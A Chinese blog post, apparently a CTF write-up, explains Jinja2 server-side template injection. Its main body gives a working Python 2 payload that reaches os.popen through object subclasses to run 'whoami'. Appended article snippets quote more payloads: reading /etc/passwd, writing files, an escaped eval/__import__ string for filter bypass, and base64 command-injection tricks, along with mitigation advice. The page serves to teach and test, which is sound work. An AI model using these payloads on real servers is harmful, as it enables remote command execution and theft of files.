Jinja2 模板注入&模板内命令执行

最新推荐文章于 2025-05-09 23:26:15 发布
最新推荐文章于 2025-05-09 23:26:15 发布
阅读量2.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33020901/article/details/79535629
本文介绍了一种利用Jinja2模板引擎进行注入攻击的方法,并通过构造特定的payload来获取目标系统的whoami信息。作者首先分析了Python2环境中可用的类及其子类,进而找到了可以执行命令的路径。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原因:

        ichunqiu 的web中有一个 Musee de X ,知道 http:// 文件能获取,但是没有想到 file:// 获取文件,根据报错也没有想过他用的是 jinja2。后来朋友说payload每个环境可能不太一样,就自己尝试了一波。


分析:

      这是 python2 运行的,结果就是输出 whoami 的信息

#code:utf-8

from jinja2 import Template
import sys
reload(sys) 
sys.setdefaultencoding('utf8')


a = Template("{{[].__class__.__base__.__subclasses__()[60].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('whoami').read()}}")
print(a.render())

   开始 我用 python3 逐步输出,然后发现怎么都不行,还是太菜 ... 用 python2 一会儿就行了 ...

C:\Users\shark\Desktop>python2
Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:25:58) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> [].__class__.__base__.__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, 
<type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, 
<type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, 
<type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, 
<type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'sys.getwindowsversion'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, 
<type 'nt.stat_result'>, <type 'nt.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, 
<class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'functools.partial'>, <type 'MultibyteCodec'>, <type 'MultibyteIncrementalEncoder'>, <type 'MultibyteIncrementalDecoder'>, <type 'MultibyteStreamReader'>, <type 'MultibyteStreamWriter'>]

发现输出很多类名,根据猜测为 import 的类和内置的类。

于是猜测 payload 为 类名.方法 格式

但是我不知道题目用的是那个类,于是构造

[].__class__.__base__.__subclasses__()[59]

去获取题目用的类名 发现为 

<class 'warnings.catch_warnings'>

于是找到自己对应类的序号,然后在本地构造


Flask模板注入学习
afei001
10-23 562
目录 1.前言 2.Flask模板注入 (1)模版XSS注入2)SSTI文件读取命令执行2.1)SSTI漏洞构造 (2.2)python常用的魔术方法 (2.3)文件读取Payload (2.4)命令执行Payload (3)模版注入防御 1.前言 对于学习Flask模板注入,需要对Flask框架和Jinja 2模板引擎有一定的了解。不熟悉的小伙伴可以先学习Flask入门文章。 2.Flask模板注入 在不正确的使用flask...
jinja2模板注入_flask/jinja2模板注入
weixin_30802953的博客
01-17 794
Flask是什么Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。就是部网站用的简单hello worldfrom flask import Flaskapp = Flask(__name__)@app.route("/")def hello():return "Hello World!"if __na...
SSTI模版注入
最新发布
2403_90011488的博客
05-09 1128
but,如果没有对用户输入进行严格的验证和过滤,攻击者可以注入恶意的模板代码,从而在服务器端执行一系列操作(非预期,不可知)。input={{config.items}} 访问页面,Jinja2模板引擎会执行 config.items() ,可能会返回应用程序的配置信息,导致信息泄露。后面在端口前面加冒号:就连上了(我也纳闷,在kali里有时候接端口是空格,冒号不行,有时候又得冒号,但物理机url包是冒号的)这是开发者未预期的操作,因为用户输入的模板代码被模板引擎执行了,所以叫非预期操作。
Flask jinja2模板注入思路总结
weixin_53146913的博客
05-12 1460
一、总结一下常用的payload: python2: 读写文件: #读文件: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} #写文件: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }} 也可以通过写jinja2的environment.py执行命令; jinja2模板会load这个module,而且这个en
命令注入与代码执行详解
2301_76964281的博客
07-03 1900
例如,被过滤的命令是 cat,可在终端执行 echo 'cat' | base64 得到编码后的字符串 Y2F0Cg== ,然后执行 echo 'Y2F0Cg==' | base64 -d | command ,其中 command 为要执行的具体命令,如查看文件 test.txt 的内容,即 echo 'Y2F0Cg==' | base64 -d | test.txt。$@ 表示所有参数。需要注意的是,命令注入绕过的具体方法会受到目标系统的环境、应用程序的实现以及所施加的安全限制等多种因素的影响。
CTF模板注入
weixin_43952190的博客
07-30 4330
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&amp;filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
2025.2.8——二、Confusion1 SSTI模板注入|Jinja2模板
2402_87387800的博客
02-10 1023
题目来源:攻防世界 Confusion1。
SSTI模板注入(jinja2)
weixin_74020633的博客
03-30 1140
前面学习了SSTI中的smarty类型,今天学习了Jinja2,两种类型都是flask框架的,但是在注入的语法上还是有不同SSTI:服务器端模板注入,也属于一种注入类型。与sql注入类似,也是通过凭借进行命令的执行,sql是和数据库的查询语句进行拼接。SSTI是在后端的渲染进行拼接,SSTI主要是运用在目前的网站框架下。经过查询资料,SSTI漏洞产生的原因:因为在函数渲染时,对于用户输入的变量没有进行渲染,才会导致漏洞的出现附上一张经典判断SSTI模板类型的图。
SSTI模板注入及绕过姿势(基于Python-Jinja2)
热门推荐
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
Flask(Jinja2) 服务端模板注入漏洞复现
玄道的网安博客
01-17 769
简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。 漏洞概述 其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行 环境搭建 这里使用vulhub进行搭建 地址: https://github.com/vulhub/vulhub/tree/master/flask/ssti 进入目录并编译运行测试环境 cd vu...
CTF-SSTI模板注入
2302_78903258的博客
07-22 2077
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1093
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
CTF之路:关于Flask模板注入
zw05011的博客
01-07 6091
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado
qq_43564182的博客
07-04 577
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado 文章目录CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado解题网页中出现cookie: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210704232702503.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5853
“百度杯”CTF比赛 十一月场 Web题:Fuzz python SSTI模板注入
CTF_Web:从0学习Flask模板注入(SSTI)
AFCC_的博客(Web_Dog)
08-30 6345
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
一天一道ctf 第23天(模板注入
scrawman的博客
04-12 311
[BJDCTF2020]The mystery of ip 点击Flag会返回本机的IP地址,抓包看一下
python Jinja2 模板编程
JohnSon
02-28 1493
Jinja2基本语法 {% %} 控制结构,可以用来写判断循环等语句 {{}} 变量取值 {# #} 注释 快速入门的例子 from jinja2 import Template ## ex1 t = Template("hello {{person}}") msg = t.render(person="bob") print(msg) # hello bob ## ex2 t = Te...
CTF-web-ssti模板注入漏洞
Ye的博客
04-14 1344
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
ssti模板注入jinja2
01-19
### Jinja2 SSTI 攻击原理 在Web应用程序中,如果开发者允许用户输入的数据未经严格验证就传递给模板引擎进行渲染,则可能导致服务器端模板注入(Server-Side Template Injection, SSTI)。对于基于Jinja2的框架而言,攻击者可以通过精心构造恶意输入来执行任意代码。 #### 利用过程示例 假设存在一个简单的Flask应用,其中包含如下代码片段: ```python from flask import Flask, render_template_string app = Flask(__name__) @app.route(&#39;/unsafe/&lt;string:name&gt;&#39;) def unsafe(name): template = f&#39;Hello {name}&#39; return render_template_string(template) if __name__ == &#39;__main__&#39;: app.run(debug=True) ``` 上述实现方式非常危险,因为`render_template_string()`函数直接将未经过滤的名字参数作为模板的一部分进行了渲染。此时,攻击者可以提交特殊构造的字符串,例如`{{7*7}}`,这将会使服务返回计算结果而不是原始文本[^1]。 更进一步地,通过访问路径 `/unsafe/{{&#39;&#39;.__class__.__mro__[2].__subclasses__()}}` ,攻击者可以获得当前环境中所有已加载类的对象列表,从而可能发现可用于远程命令执行或其他形式提权操作的具体实例[^3]。 然而值得注意的是,在实际渗透测试过程中应当遵循合法授权范围内的活动准则;非法入侵他人计算机信息系统属于违法行为。 ### 防护建议 为了防止此类漏洞的发生,应该采取以下几种策略之一或组合使用: - **最小权限原则**:确保运行Web应用程序的服务进程仅具有完成工作所需的最低限度的操作系统级权限。 - **禁用调试模式**:生产环境下的部署应关闭任何不必要的功能选项,特别是那些涉及动态编译或解释器交互的功能开关。 - **白名单校验机制**:对传入的应用逻辑控制流影响较大的变量实施严格的格式化检查,只接受预期之内安全值域内的输入项。 - **自定义沙箱环境**:针对特定场景定制化的限制性上下文空间内解析并执行模板指令集,阻止潜在危害扩散至整个宿主平台之外。 - **更新依赖库版本**:定期审查项目所使用的第三方组件清单,并及时升级到最新稳定发行版以修复已知的安全隐患[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值